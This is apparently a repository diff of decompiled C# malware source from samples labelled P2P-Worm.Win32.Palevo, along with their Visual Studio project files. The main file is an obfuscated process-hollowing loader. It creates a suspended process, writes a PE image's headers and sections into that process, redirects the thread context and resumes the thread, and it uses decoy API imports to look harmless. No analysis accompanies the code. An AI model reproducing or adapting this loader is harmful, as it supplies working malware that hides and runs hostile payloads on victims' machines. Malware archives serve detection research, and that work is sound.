buffy.Startup_Information startupInformation1;
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
ref buffy.Startup_Information local3 = ref startupInformation2;
object obj9 = obj1;
buffy.Process_Information processInformation1;
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
ref buffy.Process_Information local4 = ref processInformation2;
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
object obj10 = (object) processInformation2;
object Instance4 = (object) startupInformation2;
object obj11 = (object) securityFlags3;
object obj12 = (object) securityFlags2;
if (-((uint) num2 > 0U ? 1 : 0) == 0)
return;
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
buffy.NT_Headers ntHeaders2;
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
{
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
}, (string[]) null, (Type[]) null);
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
{
(object) 65539
}, (string[]) null, (Type[]) null);
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
return;
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
string DASDAS3E2_2 = VVVVVVCAE;
object obj13 = obj12;
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
ref buffy.Security_Flags local5 = ref securityFlags2;
object obj14 = obj11;
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
ref buffy.Security_Flags local6 = ref securityFlags3;
IntPtr DSA43R3W2 = num1;
object obj15 = Instance4;
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
ref buffy.Startup_Information local7 = ref startupInformation2;
object obj16 = obj10;
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
ref buffy.Process_Information local8 = ref processInformation2;
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
object Instance5 = (object) processInformation2;
object obj17 = (object) startupInformation2;
object obj18 = (object) securityFlags3;
object obj19 = (object) securityFlags2;
if (-((uint) num3 > 0U ? 1 : 0) == 0)
return;
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
object obj21 = Instance1;
buffy.Context context1;
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
ref buffy.Context local9 = ref context2;
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
object Instance6 = (object) context2;
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
long num5;
int num6 = checked ((int) num5);
ref int local10 = ref num6;
int num7 = 0;
ref int local11 = ref num7;
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
long num9 = (long) num6;
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
int AL8ZCRFWNU1 = checked ((int) num9);
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
if (num11 == 0U)
return;
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
int AL8ZCRFWNU2 = checked ((int) num11);
byte[] DSAE32_1 = DAS4DA3;
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
uint num12;
int num13 = checked ((int) num12);
ref int local12 = ref num13;
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
uint num15 = checked ((uint) num13);
long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
int num18 = 0;
while (num18 <= num17)
{
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
buffy.Section_Header sectionHeader1;
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
buffy.Section_Header sectionHeader2;
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
int index = 0;
while (index <= num19)
{
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
checked { ++index; }
}
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
byte[] DSAE32_2 = numArray;
int da22S3 = checked ((int) sectionHeader1.DA22S3);
int num20 = checked ((int) num15);
ref int local13 = ref num20;
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
num15 = checked ((uint) num20);
checked { ++num18; }
}
object bytes = (object) BitConverter.GetBytes(num11);
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
byte[] DSAE32_3 = (byte[]) bytes;
int num22 = checked ((int) num15);
ref int local14 = ref num22;
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
num12 = checked ((uint) num22);
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
{
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
}, (string[]) null, (Type[]) null);
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
object obj29 = Instance6;
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
ref buffy.Context local15 = ref context2;
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
object obj30 = (object) context2;
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
int num25 = (int) ws2XvbnvO9_2(DASEAS);
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RpcNsProfileEltAdd(
long ProfileNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
ref IntPtr IfId,
long MemberNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
long Priority,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MgmGetNextMfeStats(
ref IntPtr pimmStart,
ref long pdwBufferSize,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
ref long pdwNumEntries);
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MprAdminDeviceEnum(
ref IntPtr hMprServer,
long dwLevel,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
ref long lpdwTotalEntries);
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MsiDatabaseImport(
ref IntPtr hDatabase,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetReplExportDirSetInfo(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
ref long parm_err);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetUseGetInfo(
ref IntPtr UncServerName,
ref IntPtr UseName,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsoleInput(
long hConsoleInput,
ref IntPtr lpBuffer,
long nLength,
ref long lpNumberOfEventsRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SnmpMgrCtl(
ref IntPtr session,
long dwCtlCode,
ref long lpvInBuffer,
long cbInBuffer,
ref long lpvOUTBuffer,
long cbOUTBuffer,
ref long lpcbBytesReturned);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long AddAuditAccessAceEx(
IntPtr pAcl,
long dwAceRevision,
long AceFlags,
long dwAccessMask,
ref IntPtr pSid,
long bAuditSuccess,
long bAuditFailure);
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLInstallerError(
int iError,
ref long pfErrorCode,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
int cbErrorMsgMax,
ref int pcbErrorMsg);
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RasSetCredentials(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
ref IntPtr TLPRASCREDENTIALSA,
long @bool);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsole(
long hConsoleInput,
ref long lpBuffer,
long nNumberOfCharsToRead,
ref long lpNumberOfCharsRead,
ref long lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadEncryptedFileRaw(
ref IntPtr pfExportCallback,
ref long pvCallbackContext,
ref long pvContext);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadPrinter(
long hPrinter,
ref long pBuf,
long cdBuf,
ref long pNoBytesRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReleaseSemaphore(
long hSemaphore,
long lReleaseCount,
ref long lpPreviousCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetStringTypeEx(
long Locale,
long dwInfoType,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
long cchSrc,
ref int lpCharType);
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetVolumePathName(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
long cchBufferLength);
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ToAscii(
long uVirtKey,
long uScanCode,
ref byte lpbKeyState,
ref long lpwTransKey,
long fuState);
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
public struct Context
{
public uint II69TOHMUR;
public uint d2;
public uint das;
public uint d9;
public uint ad;
public uint dsa;
public uint ds;
public buffy.Save Save;
public uint dh;
public uint sad;
public uint da;
public uint MD;
public uint RD;
public uint mSI;
public uint WDA;
public uint AD3;
public uint D21;
public uint AS4;
public uint K32;
public uint F2W;
public uint HHJ;
public uint ADF5;
public uint GSSA;
public uint DSAAA;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] er6rgdr65;
}
public struct Save
{
public uint KD7JX2MXT;
public uint JCNS3ZPSXO;
public uint DAS3;
public uint DAS23;
public uint ADSA;
public uint DAF35;
public uint FA32D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] FSDRF43;
public uint FA32QA;
}
public struct Misc
{
public uint SDUHRL;
public uint GSIJ;
}
public struct Section_Header
{
public byte FSDPOU4PO3;
public buffy.Misc Mi2sc;
public uint AL8ZCRFWNU;
public uint DA22S3;
public uint PoinEEter;
public uint E2Q4RS;
public uint FS523QF;
public uint FSB43FSD4;
public uint QBFAS4E;
public uint AS32QFZS;
}
public struct Process_Information
{
public IntPtr DAS4QQW;
public IntPtr RFSER;
public int TGJWE;
public int SDFFFFFFFFFF;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CSZE;
public string FSDR4G;
public string AAAAAAAAAA;
public string AADDDDDDD;
public int ADA;
public int C;
public int AEDS;
public int DASDDDD;
public int XASE4;
public int DAS3EDFZ;
public int DVA3ES;
public int CCCCQ;
public short FDSRS;
public short VYE5X;
public int KHJKIHJK;
public int KHJKHJK;
public int KHJKHJ;
public int KHJKJHK;
}
public struct Security_Flags
{
public int GFSETWE;
public IntPtr EWEWWW;
public int DASDAS;
}
public struct DOS_Header
{
public ushort DASDASFASF;
public ushort QWEQWE;
public ushort EQWEQWEQWE;
public ushort HFGHFGHFGH;
public ushort HFGHFGHFG;
public ushort DASD444444;
public ushort DASFASE33;
public ushort DASKGHJ;
public ushort DASVZDF;
public ushort VXCVXC;
public ushort VXCVXCV;
public ushort EWECS;
public ushort EWADC;
public ushort UADA3;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservWWWWWWWWWWWWWWWedA;
public ushort DAS4E;
public ushort UJJ;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] DDDDDDDDD;
public int DASE3ASDAS;
}
public struct NT_Headers
{
public uint SSSSSSSSSSSQ;
public buffy.File_Header DSEEEEE;
public buffy.Optional_Headers OOOU;
}
public struct File_Header
{
public ushort ITTTTTTTT;
public ushort DAAAAAAAA3;
public uint HRFTYTYTR;
public uint GJGFSFS;
public uint FSVGY;
public ushort FSFV;
public ushort A34FFC;
}
public struct Optional_Headers
{
public ushort WWWWWWWWW;
public byte MaAAAAAAAAAAAjor;
public byte MiSSSSSSSSSSSnor;
public uint SSSSSSSSSSSSS;
public uint FFFFFFFFFFF;
public uint XXXXXXXX;
public uint DDDDDDDDAAA;
public uint FSSSSSSS;
public uint RSFS43;
public uint DFAZDASD;
public uint SectionA;
public uint FileA;
public ushort GDFTDFFFF;
public ushort HGDFHD564;
public ushort GD5ERGD;
public ushort FSD5YHD;
public ushort ASDASG;
public ushort AS4ASAS;
public uint CCC;
public uint DASRDASRASR;
public uint WQDASDASD;
public uint Assssssss;
public ushort fsd4s;
public ushort fjio;
public uint dasrlajstpoi;
public uint dasdraskyjhuasp;
public uint SHRedas4wa9uqserve;
public uint fsdtsysyt;
public uint eawdasdas3;
public uint Cocccunt;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public buffy.Data_Directory[] GSDGSDT4;
}
public struct Data_Directory
{
public uint ewq34q234;
public uint das34aw33;
}
public delegate bool GN04L0ER8I(
string ASFASE3,
string DASDAS3E2,
ref buffy.Security_Flags DASCASE,
ref buffy.Security_Flags CASE222,
bool DAS432E,
uint AEDFKJK32,
IntPtr DSA43R3W,
string ase32ew,
[In] ref buffy.Startup_Information das43fsa,
out buffy.Process_Information das3);
public delegate bool ZGOQ8VM05M(
IntPtr DASE32,
int AL8ZCRFWNU,
byte[] DSAE32,
int DASEADAS,
out int ASD43FA);
public delegate int Q7QRRP639W(
IntPtr FASFDASDAS,
int AL8ZCRFWNU,
ref int CAS32,
int ASDASC,
ref int CASTWE);
public delegate IntPtr W6CTR6GLCC(
IntPtr DASE43E,
int AL8ZCRFWNU,
uint DASCAS3,
uint DAS3,
uint DAS32);
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/pizde.cs
+645
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/P2P-Worm.Win32.Palevo.brve.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9F4D5823-B0B6-4011-9309-6008EBD4A806}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>66666</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="pizde.cs" />
<Compile Include="buffy.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/P2P-Worm.Win32.Palevo.brve.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
